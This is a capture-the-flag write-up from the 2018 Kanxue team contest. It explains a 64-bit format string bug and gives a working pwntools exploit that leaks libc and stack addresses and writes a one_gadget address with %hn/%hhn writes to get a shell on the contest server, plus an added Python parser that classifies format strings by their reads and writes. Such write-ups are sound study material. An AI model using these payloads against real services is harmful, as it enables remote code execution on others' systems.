[Original] 看雪 CTF 2018 Team Contest - 你眼中的世界 (The World in Your Eyes)
2018-12-27 17:08
64-bit format string bug. The server environment apparently wasn't set up properly: the FORTIFY_SOURCE check the binary was built with no longer triggers there (locally it aborts on `%n`, remotely it doesn't), so you can just brute-force a one_gadget address into place and be done.
```
❯ nc 211.159.175.39 8686
echo from your heart
lens of your word: 10
word: %n
echo:
lens of your word: ^C
```

Locally:

```
[root@aqsv] ~/pediy ❯ ./echo_from_your_heart
echo from your heart
lens of your word: 10
word: %n
echo: *** %n in writable segment detected ***
[1] 26614 abort (core dumped) ./echo_from_your_heart
```
Ugly exploit = =
```python
from pwn import *

p = remote('211.159.175.39', 8686)

def oneloop(payload):
    # Answer the length prompt, then send the format string itself.
    p.sendlineafter('your word:', str(len(payload) + 10))
    p.sendlineafter('word:', payload)

# Round 1: dump the first 38 stack arguments to leak a libc pointer and a stack pointer.
payload = ''.join(['%{}$016lx '.format(str(x)) for x in range(1, 39)])
oneloop(payload)
leak = p.recvuntil("lens", drop=True).strip().split(' ')
libcleak = int(leak[8], 16) - 240 - 0x20740
one_gadget = libcleak + 0x45216
stackleak = int(leak[10], 16)
p.info("libcleak " + hex(libcleak))
p.info("stackleak " + hex(stackleak))
p.info("one_gadget " + hex(one_gadget))

# Round 2: point the pointer at argument 10 to the target stack slot (low 2 bytes).
payload = '%{}c%10$hn'.format(str(-0xe0 + stackleak & 0xffff))
payload += ''.join(['%{}$016lx '.format(str(x)) for x in range(1, 10)])
oneloop(payload)

# Round 3: write the low 2 bytes of one_gadget through argument 36.
payload = '%{}c%36$hn'.format(str(one_gadget & 0xffff))
payload += ''.join(['%{}$016lx '.format(str(x)) for x in range(1, 36)])
oneloop(payload)

# Round 4: move the argument-10 pointer two bytes further up.
payload = '%{}c%10$hn'.format(str(-0xe0 + 2 + stackleak & 0xffff))
payload += ''.join(['%{}$016lx '.format(str(x)) for x in range(1, 10)])
oneloop(payload)

# Round 5: write the next byte of one_gadget there.
payload = '%{}c%36$hhn'.format(str((one_gadget >> 16) & 0xffff))
payload += ''.join(['%{}$016lx '.format(str(x)) for x in range(1, 36)])
oneloop(payload)

p.interactive()
```
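As an added illustration (not part of the original post or its exploit), a small parser that reports what a user-controlled format string like the ones above asks printf to do: how many stack arguments it reads, which ones it writes through with `%n` and how many bytes, and the value the first `%n` would store. It assumes x86-64 Linux type sizes and the explicit-width padding style used in the payloads.

```python
import re

# Added example, not code from the original post: parse a user-controlled printf
# format string and report what it asks printf to read and write.
# One conversion: optional "N$" position, flags, width, precision, length, type.
DIRECTIVE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?[-+ #0]*(?P<width>\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?P<len>hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfFgGaAcspn%])"
)
# Bytes stored by each %n variant on x86-64 Linux (the exploit uses %hn and %hhn).
WRITE_SIZE = {"hh": 1, "h": 2, None: 4, "l": 8, "ll": 8, "j": 8, "z": 8, "t": 8}


def classify(fmt):
    """Count argument reads, list %n writes as (arg index, byte size) and give
    the highest argument index the string reaches into the stack for."""
    reads, writes, highest, nxt = 0, [], 0, 0
    for m in DIRECTIVE.finditer(fmt):
        if m.group("conv") == "%":
            continue                       # literal percent, no argument
        if m.group("pos"):
            idx = int(m.group("pos"))      # explicit %N$ index
        else:
            nxt += 1                       # next sequential argument
            idx = nxt
        highest = max(highest, idx)
        if m.group("conv") == "n":
            writes.append((idx, WRITE_SIZE.get(m.group("len"), 4)))
        else:
            reads += 1
    verdict = "write" if writes else ("read" if reads else "literal")
    return {"verdict": verdict, "reads": reads, "writes": writes, "highest_arg": highest}

def stored_value(fmt):
    """Value the first %n stores: bytes printed before it, assuming every earlier
    conversion has an explicit width larger than its natural output (true for the
    %Nc and %016lx padding used above). None if that assumption fails or no %n."""
    count, last = 0, 0
    for m in DIRECTIVE.finditer(fmt):
        count += m.start() - last          # literal text between directives
        last = m.end()
        conv, width = m.group("conv"), m.group("width")
        if conv == "n":
            return count
        if conv == "%":
            count += 1
        elif width and width != "*":
            count += int(width)
        else:
            return None                    # natural length unknown
    return None
```

Running `classify` on the round-1 leak payload reports 38 reads and no writes, while the round-3 payload reports one 2-byte write through argument 36 whose stored value is exactly the `%Nc` width.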
Last edited 2018-12-28 11:43 by aqs, reason: